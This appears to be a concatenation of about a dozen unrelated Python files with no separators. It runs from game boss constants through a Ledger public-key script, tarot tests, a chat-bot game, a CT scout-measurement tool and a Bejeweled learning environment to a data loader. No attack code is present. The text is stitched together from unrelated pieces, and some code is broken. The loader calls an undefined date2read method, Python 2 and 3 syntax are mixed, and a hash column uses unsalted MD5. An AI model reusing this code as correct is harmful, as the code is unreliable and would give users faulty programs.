214 AUGUST31_FIREWORKS = 215 OCTOBER31_FIREWORKS = 31 NOVEMBER19_FIREWORKS = 32 FEBRUARY14_FIREWORKS = 51 JULY14_FIREWORKS = 52 JUNE22_FIREWORKS = 53 BIGWIG_INVASION = 54 TOT_REWARD_JELLYBEAN_AMOUNT = 100 TOT_REWARD_END_OFFSET_AMOUNT = 0 LawbotBossMaxDamage = 2700 LawbotBossWinningTilt = 40 LawbotBossInitialDamage = 1350 LawbotBossBattleOnePosHpr = ( -2.798, -60, 0, 0, 0, 0) LawbotBossBattleTwoPosHpr = ( -2.798, 89, 19.145, 0, 0, 0) LawbotBossTopRampPosA = ( -80, -35, 18) LawbotBossTopRampTurnPosA = (-80, 10, 18) LawbotBossP3PosA = ( 55, -9, 0) LawbotBossTopRampPosB = (80, -35, 18) LawbotBossTopRampTurnPosB = (80, 10, 18) LawbotBossP3PosB = ( 55, -9, 0) LawbotBossBattleThreePosHpr = LawbotBossBattleTwoPosHpr LawbotBossBottomPos = ( 50, 39, 0) LawbotBossDeathPos = (50, 40, 0) LawbotBossGavelPosHprs = [ ( 35, 78.328, 0, -135, 0, 0), (68.5, 78.328, 0, 135, 0, 0), (47, -33, 0, 45, 0, 0), (-50, -39, 0, -45, 0, 0), (-9, -37, 0, 0, 0, 0), (-9, 49, 0, -180, 0, 0), (32, 0, 0, 45, 0, 0), (33, 56, 0, 135, 0, 0)] LawbotBossGavelTimes = [ ( 0.2, 0.9, 0.6), (0.25, 1, 0.5), (1.0, 6, 0.5), (0.3, 3, 1), (0.26, 0.9, 0.45), (0.24, 1.1, 0.65), (0.27, 1.2, 0.45), (0.25, 0.95, 0.5)] LawbotBossGavelHeadings = [ ( 0, -15, 4, -70 - 45, 5, 45), (0, -45, -4, -35, -45, -16, 32), (0, -8, 19, -7, 5, 23), (0, -4, 8, -16, 32, -45, 7, 7, -30, 19, -13, 25), (0, -45, -90, 45, 90), (0, -45, -90, 45, 90), (0, -45, 45), (0, -45, 45)] LawbotBossCogRelBattleAPosHpr = ( -25, -10, 0, 0, 0, 0) LawbotBossCogRelBattleBPosHpr = (-25, 10, 0, 0, 0, 0) LawbotBossCogAbsBattleAPosHpr = ( -5, -2, 0, 0, 0, 0) LawbotBossCogAbsBattleBPosHpr = (-5, 0, 0, 0, 0, 0) LawbotBossWitnessStandPosHpr = ( 54, 100, 0, -90, 0, 0) LawbotBossInjusticePosHpr = ( -3, 12, 0, 90, 0, 0) LawbotBossInjusticeScale = (1.75, 1.75, 1.5) LawbotBossDefensePanDamage = 1 LawbotBossLawyerPosHprs = [ ( -57, -24, 0, -90, 0, 0), (-57, -12, 0, -90, 0, 0), (-57, 0, 0, -90, 0, 0), (-57, 12, 0, -90, 0, 0), (-57, 24, 0, -90, 0, 0), (-57, 36, 0, -90, 0, 0), (-57, 48, 0, -90, 0, 0), (-57, 60, 0, -90, 0, 0), (-3, -37.3, 0, 0, 0, 0), (-3, 53, 0, -180, 0, 0)] LawbotBossLawyerCycleTime = 6 LawbotBossLawyerToPanTime = 2.5 LawbotBossLawyerChanceToAttack = 50 LawbotBossLawyerHeal = 2 LawbotBossLawyerStunTime = 5 LawbotBossDifficultySettings = [ ( 38, 4, 8, 1, 0, 0), (36, 5, 8, 1, 0, 0), (34, 5, 8, 1, 0, 0), (32, 6, 8, 2, 0, 0), (30, 6, 8, 2, 0, 0), (28, 7, 8, 3, 0, 0), (26, 7, 9, 3, 1, 1), (24, 8, 9, 4, 1, 1), (22, 8, 10, 4, 1, 0)] LawbotBossCannonPosHprs = [ ( -40, -12, 0, -90, 0, 0), (-40, 0, 0, -90, 0, 0), (-40, 12, 0, -90, 0, 0), (-40, 24, 0, -90, 0, 0), (-40, 36, 0, -90, 0, 0), (-40, 48, 0, -90, 0, 0), (-40, 60, 0, -90, 0, 0), (-40, 72, 0, -90, 0, 0)] LawbotBossCannonPosA = ( -80, -51.48, 0) LawbotBossCannonPosB = (-80, 70.73, 0) LawbotBossChairPosHprs = [ ( 60, 72, 0, -90, 0, 0), (60, 62, 0, -90, 0, 0), (60, 52, 0, -90, 0, 0), (60, 42, 0, -90, 0, 0), (60, 32, 0, -90, 0, 0), (60, 22, 0, -90, 0, 0), (70, 72, 5, -90, 0, 0), (70, 62, 5, -90, 0, 0), (70, 52, 5, -90, 0, 0), (70, 42, 5, -90, 0, 0), (70, 32, 5, -90, 0, 0), (70, 22, 5, -90, 0, 0)] LawbotBossChairRow1PosB = ( 59.3, 48, 14.05) LawbotBossChairRow1PosA = (59.3, -18.2, 14.05) LawbotBossChairRow2PosB = (75.1, 48, 28.2) LawbotBossChairRow2PosA = (75.1, -18.2, 28.2) LawbotBossCannonBallMax = 12 LawbotBossJuryBoxStartPos = ( 94, -8, 5) LawbotBossJuryBoxRelativeEndPos = (30, 0, 12.645) LawbotBossJuryBoxMoveTime = 70 LawbotBossJurorsForBalancedScale = 8 LawbotBossDamagePerJuror = 68 LawbotBossCogJurorFlightTime = 10 LawbotBossCogJurorDistance = 75 LawbotBossBaseJurorNpcId = 2001 LawbotBossWitnessEpiloguePosHpr = ( -3, 0, 0, 180, 0, 0) LawbotBossChanceForTaunt = 25 LawbotBossBonusWaitTime = 60 LawbotBossBonusDuration = 20 LawbotBossBonusToonup = 10 LawbotBossBonusWeightMultiplier = 2 LawbotBossChanceToDoAreaAttack = 11 LOW_POP_NTT = 0 MID_POP_NTT = 100 HIGH_POP_NTT = 200 LOW_POP = 399 MID_POP = 499 HIGH_POP = -1 PinballCannonBumper = 0 PinballCloudBumperLow = 1 PinballCloudBumperMed = 2 PinballCloudBumperHigh = 3 PinballTarget = 4 PinballRoof = 5 PinballHouse = 6 PinballFence = 7 PinballBridge = 8 PinballStatuary = 9 PinballScoring = [ ( 100, 1), (150, 1), (200, 1), (250, 1), (350, 1), (100, 1), (50, 1), (25, 1), (100, 1), (10, 1)] PinballCannonBumperInitialPos = ( 0, -20, 40) RentalCop = 0 RentalCannon = 1 GlitchKillerZones = [ 13300, 13400, 13500, 13600] ColorPlayer = ( 0.3, 0.7, 0.3, 1) ColorAvatar = (0.3, 0.3, 0.7, 1) ColorPet = (0.6, 0.4, 0.2, 1) ColorFreeChat = ( 0.3, 0.3, 0.8, 1) ColorSpeedChat = (0.2, 0.6, 0.4, 1) ColorNoChat = (0.8, 0.5, 0.1, 1)
import random names = ['Ethan', 'Kurt', 'Eric'] random.shuffle(names) print(names)
#!/usr/bin/env python from ledgerblue.comm import getDongle import argparse from binascii import unhexlify import base58 parser = argparse.ArgumentParser() parser.add_argument('--account_number', help="BIP32 account to retrieve. e.g. \"12345\".") args = parser.parse_args() if args.account_number == None: args.account_number = "12345" derivation_path = [44, 501, int(args.account_number)] derivation_path_hex = '{:02x}'.format(len(derivation_path)) + "".join('{:02x}'.format(x | 0x80000000) for x in derivation_path) # Create APDU message. # CLA 0xE0 # INS 0x02 GET_PUBKEY # P1 0x00 NO USER CONFIRMATION REQUIRED (0x01 otherwise) # P2 0x00 UNUSED payload_hex = derivation_path_hex adpu_hex = "E0020000" + '{:02x}'.format(len(payload_hex) / 2) + payload_hex adpu_bytes = bytearray.fromhex(adpu_hex) print("~~ Ledger Solana ~~") print("Request Pubkey") dongle = getDongle(True) result = dongle.exchange(adpu_bytes)[0:32] print("Pubkey received: " + base58.b58encode(bytes(result)))
from copy import deepcopy import tarotbot.cards as cards import pytest new_deck = lambda: deepcopy(cards.Deck(cards.tarot_deck)) #def test_deck_draw_returns_card(): # assert type(deepcopy(cards.Deck(cards.tarot_deck)).draw()) == cards.Card def test_deck_draw_exhausts_deck(): deck = deepcopy(cards.Deck(cards.tarot_deck)) with pytest.raises(IndexError): for c in range(79): deck.draw() def test_return_returns_card(): deck = deepcopy(cards.Deck(cards.tarot_deck)) d_card = deck.draw()[0] assert not d_card in deck.curr_deck deck.return_card(0) assert d_card in deck.curr_deck def test_draw_can_draw_several_cards(): deck = new_deck() d_cards = deck.draw(3) assert len(d_cards) == 3 assert type(d_cards[0]) == cards.Card def test_list_discards(): deck = new_deck() d_cards = deck.draw(3) assert len(deck.discards) == 3 assert type(deck.discards[0]) == cards.Card assert d_cards[0] in deck.discards def test_remaining(): deck = new_deck() deck.draw(3) assert deck.remaining() == 75
''' We will assume that fertility is a linear function of the female illiteracy rate. That is, f=ai+b, where a is the slope and b is the intercept. We can think of the intercept as the minimal fertility rate, probably somewhere between one and two. The slope tells us how the fertility rate varies with illiteracy. We can find the best fit line using np.polyfit(). Plot the data and the best fit line. Print out the slope and intercept. (Think: what are their units?) ''' # Plot the illiteracy rate versus fertility _ = plt.plot(illiteracy, fertility, marker='.', linestyle='none') plt.margins(0.02) _ = plt.xlabel('percent illiterate') _ = plt.ylabel('fertility') # Perform a linear regression using np.polyfit(): a, b a, b = np.polyfit(illiteracy, fertility, 1) # Print the results to the screen print('slope =', a, 'children per woman / percent illiterate') print('intercept =', b, 'children per woman') # Make theoretical line to plot x = np.array([0, 100]) y = a * x + b # Add regression line to your plot _ = plt.plot(x, y) # Draw the plot plt.show()
"""Commands: "!kstart", "!kstop".""" import random from bot.commands.command import Command from bot.utilities.permission import Permission from bot.utilities.startgame import startGame class KappaGame(Command): """Play the Kappa game. This game consists of guessing a random amount of Kappas. """ perm = Permission.User def __init__(self, bot): """Initialize variables.""" self.responses = {} self.active = False self.n = 0 self.answered = [] def match(self, bot, user, msg, tag_info): """Match if the game is active or gets started with !kstart by a user who pays 5 points.""" return self.active or startGame(bot, user, msg, "!kstart") def run(self, bot, user, msg, tag_info): """Generate a random number n when game gets first started. Afterwards, check if a message contains the emote n times.""" self.responses = bot.responses["KappaGame"] cmd = msg.strip() if not self.active: self.active = True self.n = random.randint(1, 25) self.answered = [] print("Kappas: " + str(self.n)) bot.write(self.responses["start_msg"]["msg"]) else: if msg == "!kstop" and bot.get_permission(user) not in [Permission.User, Permission.Subscriber]: self.close(bot) bot.write(self.responses["stop_msg"]["msg"]) return i = self.countEmotes(cmd, "Kappa") if i == self.n: var = {"<USER>": bot.displayName(user), "<AMOUNT>": self.n} bot.write(bot.replace_vars(self.responses["winner_msg"]["msg"], var)) bot.ranking.incrementPoints(user, bot.KAPPAGAMEP, bot) bot.gameRunning = False self.active = False self.answered = [] elif i != -1: if i not in self.answered: var = {"<AMOUNT>": i} bot.write(bot.replace_vars(self.responses["wrong_amount"]["msg"], var)) self.answered.append(i) def countEmotes(self, msg, emote): """Count the number of emotes in a message.""" msg = msg.strip() arr = msg.split(' ') for e in arr: if e != emote: return -1 return len(arr) def close(self, bot): """Close kappa game.""" self.answered = [] self.active = False bot.gameRunning = False
import click from diana.apis import DcmDir from diana.dixel import DixelView from diana.plus import measure_scout # monkey patches Dixel epilog = """ Basic algorithm is to use a 2-element Guassian mixture model to find a threshold that separates air from tissue across breadth of the image. Known to fail when patients do not fit in the scout field of view. Returns image orientation and estimated distance in centimeters. These measurements can be converted into equivalent water volumes using AAPM-published tables. \b $ diana-plus ssde tests/resources/scouts ct_scout_01.dcm ct_scout_02.dcm Measuring scout images ------------------------ ct_scout_01.dcm (AP): 28.0cm ct_scout_02.dcm (LATERAL): 43.0cm """ @click.command(short_help="Estimate patient size from localizer", epilog=epilog) @click.argument('path', type=click.Path(exists=True)) @click.argument('images', nargs=-1) def ssde(path, images): """Estimate patient dimensions from CT-localizer IMAGES for size-specific dose estimation.""" click.echo(click.style('Measuring scout images', underline=True, bold=True)) D = DcmDir(path=path) for image in images: d = D.get(image, view=DixelView.PIXELS) result = d.measure_scout() click.echo("{} ({}): {}cm".format(image, result[0], round(result[1])))
#!/usr/bin/env python # -*- coding: utf-8 -*- """ In this file/module, YOU, the user can specify some default resource values for queues of different computers This might be really useful for high-throughput calculation. You can modefy, adjudst this file to your needs """ # TODO: move computers dict somewhere else? # TODO find AiiDA solution for this def queue_defaults(queue_name, computer=None): """ In this class you specify defaults methods which you can use for workflows or normal calculations. """ ''' code = Code.get_from_string(codename) code2 = Code.get_from_string(codename2) computer = Computer.get(computer_n ame) ''' queue_resources = None print queue_name computers = { 'iff003': {'th1' : { 'resources' : {"num_machines": 1, "num_mpiprocs_per_machine" : 12}, 'walltime_sec' : 30 * 60 }, 'th1_small' : { 'resources' : {"num_machines": 1, "num_mpiprocs_per_machine" : 12}, 'walltime_sec' : 20 * 60 }} } if computer: #print 'computer' c_name = computer queue = computers.get(c_name, {}).get(queue_name, {}) res = queue.get('resources', None) wt = queue.get('walltime_sec', None) else: #print 'no computer' c_name = None res = None wt = None for comp in computers.keys(): queue = computers.get(comp, {}).get(queue_name, {}) #print 'queue {}'.format(queue) if queue: res = queue.get('resources', None) wt = queue.get('walltime_sec', None) queue_resources = {'resources' : res, 'walltime_sec' : wt } #print queue_resources return queue_resources
#__author__ = 'Tom Schaul, [email protected]' import random import copy import numpy as np from scipy import zeros from pprint import pformat, pprint #from pybrain.utilities import Named #from pybrain.rl.environments.environment import Environment # TODO: mazes can have any number of dimensions? BOARDWIDTH = 8 BOARDHEIGHT = 8 NUMGEMTYPES = 5 assert NUMGEMTYPES >= 5, "numgemtypes > 5, for unique gem drop rule" GEMTYPES = range(NUMGEMTYPES) EMPTY_SPACE = -1 ROWABOVEBOARD = 'row above board' MAX_ITERS = 100 pos = 0 got = 0 opti = 0 # constants for direction values (used for pygame animations) UP = 'up' DOWN = 'down' LEFT = 'left' RIGHT = 'right' class BejeweledBoard(): """ 2D mazes, with actions being the direction of movement (N,E,S,W) and observations being the presence of walls in those directions. It has a finite number of states, a subset of which are potential starting states (default: all except goal states). A maze can have absorbing states, which, when reached end the episode (default: there is one, the goal). There is a single agent walking around in the maze (Theseus). The movement can succeed or not, or be stochastically determined. Running against a wall does not get you anywhere. Every state can have an an associated reward (default: 1 on goal, 0 elsewhere). The observations can be noisy. """ board = None score = 0 gameover = False def __init__(self, boardsize, numgemtypes, animspeed, **args): global NUMGEMTYPES, GEMTYPES assert numgemtypes >= 5, "numgemtypes > 5, for unique gem drop rule" NUMGEMTYPES = numgemtypes GEMTYPES = range(NUMGEMTYPES) #self.setArgs(**args) self.reset() def reset(self): """ return to initial position (stochastically): """ self.board = self._getBlankBoard() self._fillBoard(self.board) while not self._canMakeMove(self.board): self.board = self._getBlankBoard() self._fillBoard(self.board) self.score = 0 self.gameover = False def _score(self, match, inboard): score = 0 board = copy.deepcopy(inboard) firstSelectedGem = {'x': match[0][0], 'y': match[0][1]} clickedSpace = {'x': match[1][0], 'y': match[1][1]} # Two gems have been clicked on and selected. Swap the gems. firstSwappingGem, secondSwappingGem = self._getSwappingGems(board, firstSelectedGem, clickedSpace) # Swap the gems in the board data structure. board[firstSwappingGem['x']][firstSwappingGem['y']] = secondSwappingGem['imageNum'] board[secondSwappingGem['x']][secondSwappingGem['y']] = firstSwappingGem['imageNum'] matchedGems = self._findMatchingGems(board) # This was a matching move. while matchedGems != []: # Remove matched gems, then pull down the board. points = [] for gemSet in matchedGems: score += (10 + (len(gemSet) - 3) * 10) for gem in gemSet: board[gem[0]][gem[1]] = EMPTY_SPACE # Drop the new gems. self._fillBoard(board) # Check if there are any new matches. matchedGems = self._findMatchingGems(board) return score def _findOptimalMoves(self, board): matches = self._possibleMoves(board) scores = [self._score(match, board) for match in matches] tup = zip(matches, scores) maxVal = max(scores) maxMoves = filter(lambda x: x[1] == maxVal, tup) return [x[0] for x in maxMoves], maxVal def performAction(self, action): movePos = self._canMakeMove(self.board) #optiMoves, optiValue = self._findOptimalMoves(self.board) scoreAdd = 0 #action = self._actionIndexToSwapTuple(action) firstSelectedGem = {'x': action[0][0], 'y': action[0][1]} clickedSpace = {'x': action[1][0], 'y': action[1][1]} # Two gems have been clicked on and selected. Swap the gems. firstSwappingGem, secondSwappingGem = self._getSwappingGems(self.board, firstSelectedGem, clickedSpace) if firstSwappingGem == None and secondSwappingGem == None: # If both are None, then the gems were not adjacent print ('gems not adjacent') firstSelectedGem = None # deselect the first gem self.lastReward = -10 return 0 # Swap the gems in the board data structure. self.board[firstSwappingGem['x']][firstSwappingGem['y']] = secondSwappingGem['imageNum'] self.board[secondSwappingGem['x']][secondSwappingGem['y']] = firstSwappingGem['imageNum'] # See if this is a matching move. matchedGems = self._findMatchingGems(self.board) if matchedGems == []: #print 'did not cause a match' # Was not a matching move; swap the gems back self.board[firstSwappingGem['x']][firstSwappingGem['y']] = firstSwappingGem['imageNum'] self.board[secondSwappingGem['x']][secondSwappingGem['y']] = secondSwappingGem['imageNum'] self.lastReward = -10 else: # This was a matching move. while matchedGems != []: # Remove matched gems, then pull down the board. for gemSet in matchedGems: scoreAdd += (10 + (len(gemSet) - 3) * 10) for gem in gemSet: self.board[gem[0]][gem[1]] = EMPTY_SPACE self.score += scoreAdd # Drop the new gems. self._fillBoard(self.board) # Check if there are any new matches. matchedGems = self._findMatchingGems(self.board) # TODO: set last reward before combos? otherwise it will get confused # when it gets extra reward # combos allowed from pieces already on the board falling into # more matches, but not allowed for pieces newly falling into board self.lastReward = scoreAdd firstSelectedGem = None global pos global got global opti if movePos: pos += 1 if scoreAdd > 0: got += 1 #if list([action[0], action[1]]) in optiMoves: # opti += 1 #print ('found match:', got, '/', pos, '=', \ # float(got) / pos, 'found optimal:', \ # opti, '/', pos, '=', float(opti) / pos if not self._canMakeMove(self.board): #print 'game ended, no more moves available' self.gameover = True # TODO: tie gameover into episodic learning stuff? self.reset() return 0 def getSensors(self): indices = self._boardToIndices(self.board) return indices def getLastReward(self): return self.lastReward # ==================================================================== # ==================== BEJEWELED HELPER FUNCTIONS ==================== # ==================================================================== # TODO: add rotation/mirroring support def _actionIndexToSwapTuple(self, action): """ Converts from action index to tuple of coords of gems to swap """ # TODO: explain indexing scheme better action = int(action[0]) # remove action number from its array swapTuple = [] if action > 11: # vertical swap swapTuple.append(divmod(action - 12, 4)) swapTuple.append((swapTuple[0][0] + 1, swapTuple[0][1])) else: # horizontal swap swapTuple.append(divmod(action, 3)) swapTuple.append((swapTuple[0][0], swapTuple[0][1] + 1)) return tuple(swapTuple) def _boardToIndices(self, board): """ Converts board to state index for each color (EXPLAIN MORE) Also: ROTATIONS/REFLECTIONS? """ # TODO: explain indexing scheme better b = np.array(board) indices = [] for color in GEMTYPES: tmp = np.array(b == color, dtype=int) binstr = ''.join((str(i) for i in tmp.flatten())) index = int(binstr, base=2) indices.append([index]) # TODO: lame that this has to be in a list return np.array(indices) def _indicesToBoard(self, indices): board = np.zeros((4,4)) for color, index in enumerate(indices): s = bin(index[0])[2:] s = '0' * (16 - len(s)) + s coords = [divmod(i, 4) for i in range(len(s)) if s[i] == '1'] for c in coords: board[c] = color return board def _getBlankBoard(self): # TODO: change to numpy.array board = [] for x in range(BOARDWIDTH): board.append([EMPTY_SPACE] * BOARDHEIGHT) return board def _getSwappingGems(self, board, firstXY, secondXY): # If the gems at the (X, Y) coordinates of the two gems are adjacent, # then their 'direction' keys are set to the appropriate direction # value to be swapped with each other. # Otherwise, (None, None) is returned. firstGem = {'imageNum': board[firstXY['x']][firstXY['y']], 'x': firstXY['x'], 'y': firstXY['y']} secondGem = {'imageNum': board[secondXY['x']][secondXY['y']], 'x': secondXY['x'], 'y': secondXY['y']} highlightedGem = None if firstGem['x'] == secondGem['x'] + 1 and firstGem['y'] == secondGem['y']: firstGem['direction'] = LEFT secondGem['direction'] = RIGHT elif firstGem['x'] == secondGem['x'] - 1 and firstGem['y'] == secondGem['y']: firstGem['direction'] = RIGHT secondGem['direction'] = LEFT elif firstGem['y'] == secondGem['y'] + 1 and firstGem['x'] == secondGem['x']: firstGem['direction'] = UP secondGem['direction'] = DOWN elif firstGem['y'] == secondGem['y'] - 1 and firstGem['x'] == secondGem['x']: firstGem['direction'] = DOWN secondGem['direction'] = UP else: # These gems are not adjacent and can't be swapped. return None, None return firstGem, secondGem def _canMakeMove(self, board): return len(self._possibleMoves(board)) > 0 def _possibleMoves(self, board): # Return True if the board is in a state where a matching # move can be made on it. Otherwise return False. # The patterns in oneOffPatterns represent gems that are configured # in a way where it only takes one move to make a triplet. oneOffPatterns = (((0,1), (1,0), (2,0), ((0,0), (0,1))), ((0,1), (1,1), (2,0), ((2,0), (2,1))), ((0,0), (1,1), (2,0), ((1,0), (1,1))), ((0,1), (1,0), (2,1), ((1,0), (1,1))), ((0,0), (1,0), (2,1), ((2,0), (2,1))), ((0,0), (1,1), (2,1), ((0,0), (0,1))), ((0,0), (0,2), (0,3), ((0,0), (0,1))), ((0,0), (0,1), (0,3), ((0,2), (0,3)))) # The x and y variables iterate over each space on the board. # If we use + to represent the currently iterated space on the # board, then this pattern: ((0,1), (1,0), (2,0))refers to identical # gems being set up like this: # # +A # B # C # # That is, gem A is offset from the + by (0,1), gem B is offset # by (1,0), and gem C is offset by (2,0). In this case, gem A can # be swapped to the left to form a vertical three-in-a-row triplet. # # There are eight possible ways for the gems to be one move # away from forming a triple, hence oneOffPattern has 8 patterns. moves = [] for x in range(BOARDWIDTH): for y in range(BOARDHEIGHT): for pat in oneOffPatterns: # check each possible pattern of "match in next move" to # see if a possible move can be made. if (self._getGemAt(board, x+pat[0][0], y+pat[0][1]) == \ self._getGemAt(board, x+pat[1][0], y+pat[1][1]) == \ self._getGemAt(board, x+pat[2][0], y+pat[2][1]) != None): moves.append(map(lambda z: (z[0] + x, z[1] + y), pat[3])) if (self._getGemAt(board, x+pat[0][1], y+pat[0][0]) == \ self._getGemAt(board, x+pat[1][1], y+pat[1][0]) == \ self._getGemAt(board, x+pat[2][1], y+pat[2][0]) != None): moves.append(map(lambda z: (z[1] + x, z[0] + y), pat[3])) return moves def _pullDownAllGems(self, board): # pulls down gems on the board to the bottom to fill in any gaps for x in range(BOARDWIDTH): gemsInColumn = [] for y in range(BOARDHEIGHT): if board[x][y] != EMPTY_SPACE: gemsInColumn.append(board[x][y]) board[x] = ([EMPTY_SPACE] * (BOARDHEIGHT - len(gemsInColumn))) + gemsInColumn def _getGemAt(self, board, x, y): if x < 0 or y < 0 or x >= BOARDWIDTH or y >= BOARDHEIGHT: return None else: return board[x][y] def _getDropSlots(self, board): # Creates a "drop slot" for each column and fills the slot with a # number of gems that that column is lacking. This function assumes # that the gems have been gravity dropped already. boardCopy = copy.deepcopy(board) self._pullDownAllGems(boardCopy) dropSlots = [] for i in range(BOARDWIDTH): dropSlots.append([]) # TODO: remove restriction that there can be no combos from new gems? # count the number of empty spaces in each column on the board for x in range(BOARDWIDTH): for y in range(BOARDHEIGHT-1, -1, -1): # start from bottom, going up if boardCopy[x][y] == EMPTY_SPACE: possibleGems = list(range(len(GEMTYPES))) for offsetX, offsetY in ((0, -1), (1, 0), (0, 1), (-1, 0)): # Narrow down the possible gems we should put in the # blank space so we don't end up putting an two of # the same gems next to each other when they drop. neighborGem = self._getGemAt(boardCopy, x + offsetX, y + offsetY) if neighborGem != None and neighborGem in possibleGems: possibleGems.remove(neighborGem) newGem = random.choice(possibleGems) boardCopy[x][y] = newGem dropSlots[x].append(newGem) return dropSlots def _findMatchingGems(self, board): gemsToRemove = [] # a list of lists of gems in matching triplets that should be removed boardCopy = copy.deepcopy(board) # loop through each space, checking for 3 adjacent identical gems for x in range(BOARDWIDTH): for y in range(BOARDHEIGHT): # TODO: make 3x3 L/T-shape matches work # look for horizontal matches if self._getGemAt(boardCopy, x, y) == self._getGemAt(boardCopy, x + 1, y) == self._getGemAt(boardCopy, x + 2, y) and self._getGemAt(boardCopy, x, y) != EMPTY_SPACE: targetGem = boardCopy[x][y] offset = 0 removeSet = [] while self._getGemAt(boardCopy, x + offset, y) == targetGem: # keep checking if there's more than 3 gems in a row removeSet.append((x + offset, y)) boardCopy[x + offset][y] = EMPTY_SPACE offset += 1 gemsToRemove.append(removeSet) # look for vertical matches if self._getGemAt(boardCopy, x, y) == self._getGemAt(boardCopy, x, y + 1) == self._getGemAt(boardCopy, x, y + 2) and self._getGemAt(boardCopy, x, y) != EMPTY_SPACE: targetGem = boardCopy[x][y] offset = 0 removeSet = [] while self._getGemAt(boardCopy, x, y + offset) == targetGem: # keep checking, in case there's more than 3 gems in a row removeSet.append((x, y + offset)) boardCopy[x][y + offset] = EMPTY_SPACE offset += 1 gemsToRemove.append(removeSet) return gemsToRemove def _getDroppingGems(self, board): # Find all the gems that have an empty space below them boardCopy = copy.deepcopy(board) droppingGems = [] for x in range(BOARDWIDTH): for y in range(BOARDHEIGHT - 2, -1, -1): if boardCopy[x][y + 1] == EMPTY_SPACE and boardCopy[x][y] != EMPTY_SPACE: # This space drops if not empty but the space below it is droppingGems.append( {'imageNum': boardCopy[x][y], 'x': x, 'y': y, 'direction': DOWN} ) boardCopy[x][y] = EMPTY_SPACE return droppingGems def _moveGems(self, board, movingGems): # movingGems is a list of dicts with keys x, y, direction, imageNum for gem in movingGems: if gem['y'] != ROWABOVEBOARD: board[gem['x']][gem['y']] = EMPTY_SPACE movex = 0 movey = 0 if gem['direction'] == LEFT: movex = -1 elif gem['direction'] == RIGHT: movex = 1 elif gem['direction'] == DOWN: movey = 1 elif gem['direction'] == UP: movey = -1 board[gem['x'] + movex][gem['y'] + movey] = gem['imageNum'] else: # gem is located above the board (where new gems come from) board[gem['x']][0] = gem['imageNum'] # move to top row def _fillBoard(self, board): dropSlots = self._getDropSlots(board) while dropSlots != [[]] * BOARDWIDTH: # do the dropping animation as long as there are more gems to drop movingGems = self._getDroppingGems(board) for x in range(len(dropSlots)): if len(dropSlots[x]) != 0: # cause the lowest gem in each slot to begin moving in the DOWN direction movingGems.append({'imageNum': dropSlots[x][0], 'x': x, 'y': ROWABOVEBOARD, 'direction': DOWN}) boardCopy = self._getBoardCopyMinusGems(board, movingGems) self._moveGems(board, movingGems) # Make the next row of gems from the drop slots # the lowest by deleting the previous lowest gems. for x in range(len(dropSlots)): if len(dropSlots[x]) == 0: continue board[x][0] = dropSlots[x][0] del dropSlots[x][0] def _getBoardCopyMinusGems(self, board, gems): # Creates and returns a copy of the passed board data structure, # with the gems in the "gems" list removed from it. # # Gems is a list of dicts, with keys x, y, direction, imageNum boardCopy = copy.deepcopy(board) # Remove some of the gems from this board data structure copy. for gem in gems: if gem['y'] != ROWABOVEBOARD: boardCopy[gem['x']][gem['y']] = EMPTY_SPACE return boardCopy def __str__(self): """ Ascii representation of the maze, with the current state """ return pformat(self.board)
__all__ = ['HashCol'] import sqlobject.col class DbHash: """ Presents a comparison object for hashes, allowing plain text to be automagically compared with the base content. """ def __init__( self, hash, hashMethod ): self.hash = hash self.hashMethod = hashMethod def __cmp__( self, other ): if other is None: if self.hash is None: return 0 return True if not isinstance( other, basestring ): raise TypeError( "A hash may only be compared with a string, or None." ) return cmp( self.hashMethod( other ), self.hash ) def __repr__( self ): return "<DbHash>" class HashValidator( sqlobject.col.StringValidator ): """ Provides formal SQLObject validation services for the HashCol. """ def to_python( self, value, state ): """ Passes out a hash object. """ if value is None: return None return DbHash( hash = value, hashMethod = self.hashMethod ) def from_python( self, value, state ): """ Store the given value as a MD5 hash, or None if specified. """ if value is None: return None return self.hashMethod( value ) class SOHashCol( sqlobject.col.SOStringCol ): """ The internal HashCol definition. By default, enforces a md5 digest. """ def __init__( self, **kw ): if 'hashMethod' not in kw: from hashlib import md5 self.hashMethod = lambda v: md5( v ).hexdigest() if 'length' not in kw: kw['length'] = 32 else: self.hashMethod = kw['hashMethod'] del kw['hashMethod'] super( sqlobject.col.SOStringCol, self ).__init__( **kw ) def createValidators( self ): return [HashValidator( name=self.name, hashMethod=self.hashMethod )] + \ super( SOHashCol, self ).createValidators() class HashCol( sqlobject.col.StringCol ): """ End-user HashCol class. May be instantiated with 'hashMethod', a function which returns the string hash of any other string (i.e. basestring). """ baseClass = SOHashCol
from numpy import * from matplotlib import pyplot as plt from math import sqrt import matplotlib import time def drawDat(Dat): fig=plt.figure(figsize=(20,10)) ax=fig.add_subplot(111) ax.scatter(Dat[:,0].flatten().A[0],Dat[:,1].flatten().A[0],s=20,c='red') plt.xlim(0,len(Dat)) plt.ylim(0,35) plt.show() def Score(rV,Rh,predic,result): N=len(predic) sq1=sqrt(sum([(result[i]-predic[i])**2 for i in predic.iterkeys()])/N) sq2=sqrt(sum((predic[i])**2 for i in predic.iterkeys())/N) sq3=sqrt(sum((result[i])**2 for i in result.iterkeys())/N) return (1-sq1/(sq2+sq3))*(float(sum(rV))/float(sum(Rh)))*100 class f2d(): def __init__(self,filepath): self.pool=[] # sampleI shape like datas self.sampleI=[0, 0,0,0,0,0, # Counts of flavor0 ~ flavor15 0,0,0,0,0, 0,0,0,0] self.legi={"flavor1":1,"flavor2":2,"flavor3":3,"flavor4":4,"flavor5":5,"flavor6":6,"flavor7":7, "flavor8":8,"flavor9":9,"flavor10":10,"flavor11":11,"flavor12":12,"flavor13":13, "flavor14":14,"flavor15":15} with open(filepath, 'r') as f: lines = f.readlines() self.stime=self.date2read(lines[0].strip().split('\t')[2]) for line in lines: self.mkpool(line) def time2read(self,dt): dt = dt.split('\t')[0] return time.mktime(time.strptime(dt,'%Y-%m-%d %H:%M:%S')) def timeMh(self,d1,d2): #return int((d1-d2)/604800) #a week return int((d1-d2)/7200) #a hour #return int((d1-d2)/86400) #a day def mkpool(self,raw): flavor,tm=raw.strip().split("\t")[1:] TM=self.time2read(tm) if flavor in self.legi: hourTM=self.timeMh(TM,self.stime) #pint hourTM while hourTM - len(self.pool) >= 0: sample = self.sampleI[:] self.pool.append(sample) self.pool[hourTM][self.legi[flavor]]+=1 def appendDat(self,filepath): with open(filepath, 'r') as f: lines = f.readlines() for line in lines: self.mkpool(line) if __name__ == "__main__": trainSet=f2d("example/TrainData_2015.1.1_2015.2.19.txt") trainMat=mat(trainSet.pool) fig=plt.figure(figsize=(20,10)) plt.plot(trainMat[:,1:]) trainSet.appendDat("example/TestData_2015.2.20_2015.2.27.txt") testMat=mat(trainSet.pool) 